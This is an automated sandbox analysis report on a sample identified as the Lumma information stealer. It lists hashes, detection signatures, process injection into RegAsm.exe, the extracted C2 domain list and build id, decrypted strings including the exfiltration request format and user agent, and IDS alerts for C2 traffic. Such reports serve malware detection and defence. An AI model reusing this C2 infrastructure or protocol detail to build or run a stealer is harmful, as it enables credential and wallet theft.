Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
a7HdB2dU5P.exe

Overview

General Information

Sample name:a7HdB2dU5P.exe
renamed because original name is a hash value
Original sample name:ec5818decca5d6703e23c9db8a772997.exe
Analysis ID:1519281
MD5:ec5818decca5d6703e23c9db8a772997
SHA1:daeca7f333cedb461891a3fa4be6a857df452b59
SHA256:2da667c881a6b5f4b773c932bcbb6825fda5a85a38bfb51e06921cb88c353f3b
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • a7HdB2dU5P.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\a7HdB2dU5P.exe" MD5: EC5818DECCA5D6703E23C9DB8A772997)
    • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["reinforcenh.shop", "offensivedzvju.shop", "fragnantbui.shop", "lootebarrkeyn.shop", "stogeneratmns.shop", "ghostreedmnu.shop", "drawzhotdog.shop", "vozmeatillu.shop", "gutterydhowi.shop"], "Build id": "FATE99--"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:07.786343+020020546531A Network Trojan was detected192.168.2.458440104.21.4.136443TCP
    2024-09-26T09:52:08.769507+020020546531A Network Trojan was detected192.168.2.458441188.114.97.3443TCP
    2024-09-26T09:52:09.681716+020020546531A Network Trojan was detected192.168.2.458442188.114.96.3443TCP
    2024-09-26T09:52:10.618108+020020546531A Network Trojan was detected192.168.2.458443188.114.96.3443TCP
    2024-09-26T09:52:11.567762+020020546531A Network Trojan was detected192.168.2.458444104.21.58.182443TCP
    2024-09-26T09:52:12.512577+020020546531A Network Trojan was detected192.168.2.458445188.114.97.3443TCP
    2024-09-26T09:52:13.467807+020020546531A Network Trojan was detected192.168.2.458446188.114.96.3443TCP
    2024-09-26T09:52:14.417603+020020546531A Network Trojan was detected192.168.2.458447104.21.77.130443TCP
    2024-09-26T09:52:16.841999+020020546531A Network Trojan was detected192.168.2.458449172.67.189.2443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:07.786343+020020498361A Network Trojan was detected192.168.2.458440104.21.4.136443TCP
    2024-09-26T09:52:08.769507+020020498361A Network Trojan was detected192.168.2.458441188.114.97.3443TCP
    2024-09-26T09:52:09.681716+020020498361A Network Trojan was detected192.168.2.458442188.114.96.3443TCP
    2024-09-26T09:52:10.618108+020020498361A Network Trojan was detected192.168.2.458443188.114.96.3443TCP
    2024-09-26T09:52:11.567762+020020498361A Network Trojan was detected192.168.2.458444104.21.58.182443TCP
    2024-09-26T09:52:12.512577+020020498361A Network Trojan was detected192.168.2.458445188.114.97.3443TCP
    2024-09-26T09:52:13.467807+020020498361A Network Trojan was detected192.168.2.458446188.114.96.3443TCP
    2024-09-26T09:52:14.417603+020020498361A Network Trojan was detected192.168.2.458447104.21.77.130443TCP
    2024-09-26T09:52:16.841999+020020498361A Network Trojan was detected192.168.2.458449172.67.189.2443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:11.097484+020020561571Domain Observed Used for C2 Detected192.168.2.458444104.21.58.182443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:12.055505+020020561551Domain Observed Used for C2 Detected192.168.2.458445188.114.97.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:08.270066+020020561631Domain Observed Used for C2 Detected192.168.2.458441188.114.97.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:07.234560+020020561651Domain Observed Used for C2 Detected192.168.2.458440104.21.4.136443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:09.259590+020020561611Domain Observed Used for C2 Detected192.168.2.458442188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:13.943312+020020561511Domain Observed Used for C2 Detected192.168.2.458447104.21.77.130443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:12.996046+020020561531Domain Observed Used for C2 Detected192.168.2.458446188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:10.172268+020020561591Domain Observed Used for C2 Detected192.168.2.458443188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:10.620207+020020561561Domain Observed Used for C2 Detected192.168.2.4645981.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:11.569455+020020561541Domain Observed Used for C2 Detected192.168.2.4537261.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:07.792672+020020561621Domain Observed Used for C2 Detected192.168.2.4528101.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:06.724512+020020561641Domain Observed Used for C2 Detected192.168.2.4606021.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:06.643740+020020560481Domain Observed Used for C2 Detected192.168.2.4631481.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:08.773382+020020561601Domain Observed Used for C2 Detected192.168.2.4608421.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:13.469353+020020561501Domain Observed Used for C2 Detected192.168.2.4644471.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:12.513950+020020561521Domain Observed Used for C2 Detected192.168.2.4533381.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:52:09.685196+020020561581Domain Observed Used for C2 Detected192.168.2.4558921.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://drawzhotdog.shop/apiAvira URL Cloud: Label: malware
    Source: https://gutterydhowi.shop/apiAvira URL Cloud: Label: malware
    Source: stogeneratmns.shopAvira URL Cloud: Label: malware
    Source: https://performenj.shop/voAvira URL Cloud: Label: malware
    Source: https://offensivedzvju.shop/Avira URL Cloud: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: lootebarrkeyn.shopAvira URL Cloud: Label: malware
    Source: reinforcenh.shopAvira URL Cloud: Label: malware
    Source: https://performenj.shop/apiGAvira URL Cloud: Label: malware
    Source: https://drawzhotdog.shop/Avira URL Cloud: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://reinforcenh.shop/api2Avira URL Cloud: Label: malware
    Source: ghostreedmnu.shopAvira URL Cloud: Label: malware
    Source: https://reinforcenh.shop/apiAvira URL Cloud: Label: malware
    Source: https://reinforcenh.shop/Avira URL Cloud: Label: malware
    Source: https://performenj.shop/Avira URL Cloud: Label: malware
    Source: https://vozmeatillu.shop/apiAvira URL Cloud: Label: malware
    Source: https://stogeneratmns.shop/apiAvira URL Cloud: Label: malware
    Source: https://vozmeatillu.shop/YAvira URL Cloud: Label: malware
    Source: gutterydhowi.shopAvira URL Cloud: Label: malware
    Source: fragnantbui.shopAvira URL Cloud: Label: malware
    Source: https://ghostreedmnu.shop/apiAvira URL Cloud: Label: malware
    Source: https://fragnantbui.shop/apiAvira URL Cloud: Label: malware
    Source: https://stogeneratmns.shop/apiDAvira URL Cloud: Label: malware
    Source: https://offensivedzvju.shop/apiAvira URL Cloud: Label: malware
    Source: https://performenj.shop/GAvira URL Cloud: Label: malware
    Source: offensivedzvju.shopAvira URL Cloud: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Source: https://performenj.shop/apiAvira URL Cloud: Label: malware
    Source: drawzhotdog.shopAvira URL Cloud: Label: malware
    Source: vozmeatillu.shopAvira URL Cloud: Label: malware
    Found malware configuration
    Source: 2.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["reinforcenh.shop", "offensivedzvju.shop", "fragnantbui.shop", "lootebarrkeyn.shop", "stogeneratmns.shop", "ghostreedmnu.shop", "drawzhotdog.shop", "vozmeatillu.shop", "gutterydhowi.shop"], "Build id": "FATE99--"}
    Multi AV Scanner detection for submitted file
    Source: a7HdB2dU5P.exeReversingLabs: Detection: 47%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
    Sample uses string decryption to hide its real strings
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: reinforcenh.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: stogeneratmns.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: fragnantbui.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: drawzhotdog.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: vozmeatillu.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: offensivedzvju.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ghostreedmnu.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: gutterydhowi.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lootebarrkeyn.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: - Screen Resoluton:
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Workgroup: -
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FATE99--
    Source: a7HdB2dU5P.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:58440 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58441 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58442 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58443 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.4:58444 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58445 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58446 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.77.130:443 -> 192.168.2.4:58447 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:58448 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.189.2:443 -> 192.168.2.4:58449 version: TLS 1.2
    Source: a7HdB2dU5P.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00447600
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0044A7E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+1Ch]2_2_0040FEBC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax2_2_0040EFFC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000120h]2_2_0040EFFC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx2_2_00415078
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+34h]2_2_00401000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh2_2_004450E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004340F5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004340F5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [eax+esi]2_2_00407120
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042A274
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], ax2_2_0042A274
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0040D2C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042A2F9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], ax2_2_0042A2F9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]2_2_00442280
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], ax2_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_00431370
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax2_2_0040A3C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax2_2_0040A3C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh2_2_0042C390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh2_2_0042C390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh2_2_00449390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00449390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00424490
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_004204A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx2_2_004204A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, esi2_2_0042D56C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0043B510
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, esi2_2_0042D58E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0042F5B7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi]2_2_004146B5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]2_2_0040F7E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], cl2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_0041A880
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp al, 2Eh2_2_0042C891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax2_2_0042C891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh2_2_00444970
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh2_2_004489F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al2_2_00434A2F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh2_2_00445AD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi]2_2_00413AE6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, ecx2_2_00413AE6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h2_2_00413AE6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]2_2_0042BB00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx2_2_00427B0F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00430BD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]2_2_00448BE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h2_2_0044AC00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]2_2_00404C10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_00426CA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add edi, 02h2_2_0041DD64
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebx]2_2_0041DD64
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]2_2_00405D20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al2_2_00434DF6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]2_2_00445D80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h2_2_0044AD90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00449E60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h2_2_00414E26
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax2_2_00414E26
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_00447EDE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0044AF10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah2_2_0044AF10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00426F20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_0041CFF0

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.4:52810 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.4:60842 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.4:53726 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056048 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop) : 192.168.2.4:63148 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.4:60602 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.4:58445 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.4:58444 -> 104.21.58.182:443
    Source: Network trafficSuricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.4:58446 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:58441 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.4:64598 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.4:53338 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.4:64447 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:58440 -> 104.21.4.136:443
    Source: Network trafficSuricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.4:58442 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.4:55892 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.4:58443 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.4:58447 -> 104.21.77.130:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58449 -> 172.67.189.2:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58441 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58449 -> 172.67.189.2:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58441 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58447 -> 104.21.77.130:443
